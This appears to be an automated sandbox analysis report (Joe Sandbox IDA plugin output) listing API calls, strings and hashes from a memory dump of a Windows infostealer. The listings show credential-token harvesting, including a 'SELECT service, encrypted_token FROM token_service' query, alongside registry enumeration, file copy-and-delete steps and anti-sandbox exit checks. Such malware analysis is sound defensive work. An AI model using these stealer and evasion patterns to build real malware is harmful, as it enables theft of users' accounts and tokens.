                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpylstrlen$AllocLocallstrcat$memcmpmemset
                                                                                                      • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00414BC3
                                                                                                      • wsprintfA.USER32 ref: 00414BF6
                                                                                                      • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00414C18
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C29
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414C36
                                                                                                        • Part of subcall function 00416DA0: lstrcpy.KERNEL32(?,00000000), ref: 00416DE6
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD8200,00000000,000F003F,?,00000400), ref: 00414C89
                                                                                                      • lstrlen.KERNEL32(?), ref: 00414C9E
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD7F48,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,0041D4B4), ref: 00414D36
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414DA5
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414DB7
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                      • String ID: %s\%s
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00409BB1
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 00409F6A
                                                                                                        • Part of subcall function 004097F0: memcmp.MSVCRT ref: 0040980B
                                                                                                        • Part of subcall function 004097F0: memset.MSVCRT ref: 0040983E
                                                                                                        • Part of subcall function 004097F0: LocalAlloc.KERNEL32(00000040,?), ref: 0040988E
                                                                                                      • lstrlen.KERNEL32(00000000,00000000), ref: 00409CAD
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 00409FEB
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                                      • String ID: X@
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D58), ref: 00415F11
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D28), ref: 00415F2A
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D70), ref: 00415F42
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96D88), ref: 00415F5A
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96DA0), ref: 00415F73
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBD968), ref: 00415F8B
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE048), ref: 00415FA3
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE348), ref: 00415FBC
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02D96DB8), ref: 00415FD4
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF718), ref: 00415FEC
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF748), ref: 00416005
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF628), ref: 0041601D
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBE1A8), ref: 00416035
                                                                                                        • Part of subcall function 00415ED0: GetProcAddress.KERNEL32(74DD0000,02DBF598), ref: 0041604E
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011D1
                                                                                                        • Part of subcall function 00401120: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,004136D7,0041D6E3), ref: 0040112A
                                                                                                        • Part of subcall function 00401120: ExitProcess.KERNEL32 ref: 0040113E
                                                                                                        • Part of subcall function 004010D0: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,004136DC), ref: 004010EB
                                                                                                        • Part of subcall function 004010D0: VirtualAllocExNuma.KERNEL32(00000000,?,?,004136DC), ref: 004010F2
                                                                                                        • Part of subcall function 004010D0: ExitProcess.KERNEL32 ref: 00401103
                                                                                                        • Part of subcall function 004011E0: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401218
                                                                                                        • Part of subcall function 004011E0: __aulldiv.LIBCMT ref: 00401226
                                                                                                        • Part of subcall function 004011E0: ExitProcess.KERNEL32 ref: 00401254
                                                                                                        • Part of subcall function 00413430: GetUserDefaultLangID.KERNEL32(?,?,004136E6,0041D6E3), ref: 00413434
                                                                                                        • Part of subcall function 00401150: ExitProcess.KERNEL32 ref: 00401186
                                                                                                        • Part of subcall function 004143C0: GetProcessHeap.KERNEL32(00000000,00000104,00401177,02DD51E0,004136EB,0041D6E3), ref: 004143CD
                                                                                                        • Part of subcall function 004143C0: HeapAlloc.KERNEL32(00000000), ref: 004143D4
                                                                                                        • Part of subcall function 004143C0: GetUserNameA.ADVAPI32(?,00000104), ref: 004143EC
                                                                                                        • Part of subcall function 00414400: GetProcessHeap.KERNEL32(00000000,00000104,004136EB,0041D6E3), ref: 0041440D
                                                                                                        • Part of subcall function 00414400: HeapAlloc.KERNEL32(00000000), ref: 00414414
                                                                                                        • Part of subcall function 00414400: GetComputerNameA.KERNEL32(?,00000104), ref: 0041442C
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 0041378A
                                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004137A8
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 004137B9
                                                                                                      • Sleep.KERNEL32(00001770), ref: 004137C4
                                                                                                      • CloseHandle.KERNEL32(?,00000000,?,02DBD9C8,?,0041D8AC,?,00000000,?,0041D8B0,?,00000000,0041D6E3), ref: 004137DA
                                                                                                      • ExitProcess.KERNEL32 ref: 004137E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Process$Exit$Heap$Alloclstrcpy$CloseEventHandleNameUser__aulldiv$ComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                      • String ID:
                                                                                                      • API String ID: 1175201934-0
                                                                                                      • Opcode ID: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
                                                                                                      • Instruction ID: 0037ec1138340b95bb434dc328289296f16cab3c571637fdb93d627daa89b4d0
                                                                                                      • Opcode Fuzzy Hash: 466e30400b452d8de00f7ab2a2e6fa4e6701d9e4b3183216076be2e723dd6b11
                                                                                                      • Instruction Fuzzy Hash: 7E318270A00204AADB04FBF2DC56BEE7779AF08708F10451EF112A61D2DF789A85C7AD
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 004011FE
                                                                                                      • __aulldiv.LIBCMT ref: 00401218
                                                                                                      • __aulldiv.LIBCMT ref: 00401226
                                                                                                      • ExitProcess.KERNEL32 ref: 00401254
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                                                                                                      • String ID: @
                                                                                                      • API String ID: 3404098578-2766056989
                                                                                                      • Opcode ID: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                      • Instruction ID: 7bcd30568b3a9749f5c78c38f6ef54fea4689c821e8202ed383253ad67bcf250
                                                                                                      • Opcode Fuzzy Hash: bb81cb4acda70f26030c3c2501203c3bf716c46d07ed01ddf58a3b899f1b5564
                                                                                                      • Instruction Fuzzy Hash: 8601FFB0940208EADB10EFD0CD4AB9EBBB8AB54705F204059E705B62D0D6785545875D
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFAC947
                                                                                                      • VirtualAlloc.KERNEL32(?,?,00002000,00000001), ref: 6CFAC969
                                                                                                      • GetSystemInfo.KERNEL32(?), ref: 6CFAC9A9
                                                                                                      • VirtualFree.KERNEL32(00000000,?,00008000), ref: 6CFAC9C8
                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001), ref: 6CFAC9E2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2903500622.000000006CF91000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF90000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2903480159.000000006CF90000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903578339.000000006D00D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903604933.000000006D01E000.00000004.00000001.01000000.00000008.sdmp
                                                                                                      • Associated: 00000000.00000002.2903626057.000000006D022000.00000002.00000001.01000000.00000008.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_6cf90000_pYJeC4VJbw.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Virtual$AllocInfoSystem$Free
                                                                                                      • String ID:
                                                                                                      • API String ID: 4191843772-0
                                                                                                      • Opcode ID: 9f2ff79a093e90f8707e9e22ddff54256107a6a4f9fa30bc71365cd79417e32b
                                                                                                      • Instruction ID: 0b774ab6cba7f8d60d775f388b95346f4f280462ac9f3a5b0962fd255e511028
                                                                                                      • Opcode Fuzzy Hash: 9f2ff79a093e90f8707e9e22ddff54256107a6a4f9fa30bc71365cd79417e32b
                                                                                                      • Instruction Fuzzy Hash: 15212C32B01204ABDB059BE9CC85BAEB7BDBB4B340F50011DF917A7740DB315C048795
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,80000001), ref: 00401274
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0040127B
                                                                                                      • RegOpenKeyExA.KERNEL32(000000FF,?,00000000,00020119,?), ref: 00401297
                                                                                                      • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,000000FF,000000FF), ref: 004012B5
                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004012BF
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                      • Instruction ID: 7bc2c45b39987af01ac2684a9b0918313f40fb8da876f9e4b9d967da472c28c8
                                                                                                      • Opcode Fuzzy Hash: df6da7dedf044903e367d3d8a7ae0c03a7d74832a2c3d67e0360b54011cb2cfc
                                                                                                      • Instruction Fuzzy Hash: 3C011D79A40608BFDB20DFE0DD49FAEB779AB88700F008159FA05E7280DA749A018B90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414754
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041475B
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,02D963F8,00000000,00020119,00000000), ref: 0041477B
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD88C0,00000000,00000000,000000FF,000000FF), ref: 0041479C
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 004147A6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                      • Instruction ID: 520453153fef2218f7e1f18e9bcc50e310f062f1fe861ea372c3465721436b4a
                                                                                                      • Opcode Fuzzy Hash: 3dd853a6faa74efcafe4ce3258c312c5c269cfcf31c2ef5712d88dc1f31cf0da
                                                                                                      • Instruction Fuzzy Hash: 62013C79A40608FFDB20DBE4ED49FAEB779EB88700F108159FA05A6290DB705A018F90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 00414314
                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 0041431B
                                                                                                      • RegOpenKeyExA.KERNEL32(80000002,02D960E8,00000000,00020119,00000000), ref: 0041433B
                                                                                                      • RegQueryValueExA.KERNEL32(00000000,02DD7F30,00000000,00000000,000000FF,000000FF), ref: 0041435C
                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00414366
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: Heap$AllocCloseOpenProcessQueryValue
                                                                                                      • String ID:
                                                                                                      • API String ID: 3466090806-0
                                                                                                      • Opcode ID: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                      • Instruction ID: 8a55c6bb4586fa39bc5dd89715e436abefd5940c4b9bd8db073c1251d6bd8ac1
                                                                                                      • Opcode Fuzzy Hash: 423f413abd2b9c08310d568d7ed0a8882adbdfbf2920ff6ae677e6fc83315809
                                                                                                      • Instruction Fuzzy Hash: E3014FB5A40608BFDB20DBE4ED49FAEB77DEB88701F005154FA05E7290DB70AA01CB90
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • GetEnvironmentVariableA.KERNEL32(02DD5230,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0000FFFF,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 0040998D
                                                                                                      • LoadLibraryA.KERNEL32(02DD88A0,?,?,?,?,?,?,?,?,?,?,?,0040EA16), ref: 00409A16
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416E20: lstrlen.KERNEL32(00000000,?,?,00412BE0,0041D59B,0041D59A,?,?,004137D6,00000000,?,02DBD9C8,?,0041D8AC,?,00000000), ref: 00416E2B
                                                                                                        • Part of subcall function 00416E20: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416E85
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                      • SetEnvironmentVariableA.KERNEL32(02DD5230,00000000,00000000,?,0041DA4C,?,0040EA16,C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;,0041D6EF), ref: 00409A02
                                                                                                      Strings
                                                                                                      • C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;, xrefs: 00409982, 00409996, 004099AC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                                                                                                      • String ID: C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsApps;
                                                                                                      • API String ID: 2929475105-3463377506
                                                                                                      • Opcode ID: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
                                                                                                      • Instruction ID: 6647cd3c00128b620a4a232c7fbe97fce3d03bd073b05a107f0d1bf2b4fd60a8
                                                                                                      • Opcode Fuzzy Hash: 87c4ecc5cae1bb30076c5fa7cae4b4b31d77e3e1fa7da15e9efafcded89b07fc
                                                                                                      • Instruction Fuzzy Hash: 134196B5900A009BDB24DFA4FD85AAE37B6BB44305F01512EF405A72E2DFB89D46CF54
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                      • VirtualProtect.KERNEL32(?,?,@:h@,@:h@), ref: 0040668F
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: ProtectVirtual
                                                                                                      • String ID: :h@$:h@$@:h@
                                                                                                      • API String ID: 544645111-3492212131
                                                                                                      • Opcode ID: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                      • Instruction ID: 05c83ec730d02739dc9afbe7597ff905435882b08ae1c12394b3aafa6fe5c026
                                                                                                      • Opcode Fuzzy Hash: 3a0ba57e5e1d9d33aaf5f8e161c54dbb9d0ff39d4d0ab0475c83cdde206519fc
                                                                                                      • Instruction Fuzzy Hash: 272131B4A00208EFDB04CF85C544BAEBBB1FF48304F1185AAD406AB381D3399A91DF85
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
                                                                                                        • Part of subcall function 00416FB0: lstrcpy.KERNEL32(00000000), ref: 00417004
                                                                                                        • Part of subcall function 00416FB0: lstrcat.KERNEL32(00000000,00000000), ref: 00417012
                                                                                                        • Part of subcall function 00416EA0: lstrcpy.KERNEL32(?,0041D6E3), ref: 00416F05
                                                                                                        • Part of subcall function 00415260: GetSystemTime.KERNEL32(?,02D91B90,0041D129,?,?,?,?,?,?,?,?,?,00404623,?,00000014), ref: 00415286
                                                                                                        • Part of subcall function 00416F20: lstrcpy.KERNEL32(00000000,?), ref: 00416F72
                                                                                                        • Part of subcall function 00416F20: lstrcat.KERNEL32(00000000), ref: 00416F82
                                                                                                      • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF41
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0DF
                                                                                                      • lstrlen.KERNEL32(00000000), ref: 0040D0F3
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040D16C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2882938021.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000448000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.000000000044B000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000549000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000624000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2882938021.0000000000636000.00000040.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_pYJeC4VJbw.jbxd
                                                                                                      Yara matches
                                                                                                      Similarity
                                                                                                      • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                                      • String ID:
                                                                                                      • API String ID: 211194620-0
                                                                                                      • Opcode ID: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
                                                                                                      • Instruction ID: 64a31cdf4344fffa4b83296b1621afa9cae3fe45de11617b70f8002e61f1a089
                                                                                                      • Opcode Fuzzy Hash: e6516416815714df6453fd4f82fac44d28edec781fd119e966b198ebd49bc1bd
                                                                                                      • Instruction Fuzzy Hash: 758147769102049BCB14FBA1DC52EEE7739BF54308F51411EF516B6091EF38AA89CBB8
                                                                                                      Uniqueness

                                                                                                      Uniqueness Score: -1.00%

                                                                                                      APIs
                                                                                                        • Part of subcall function 00416D40: lstrcpy.KERNEL32(0041D6E3,00000000), ref: 00416D88
                                                                                                        • Part of subcall function 00416FB0: lstrlen.KERNEL32(?,0041D8B0,?,00000000,0041D6E3), ref: 00416FC5
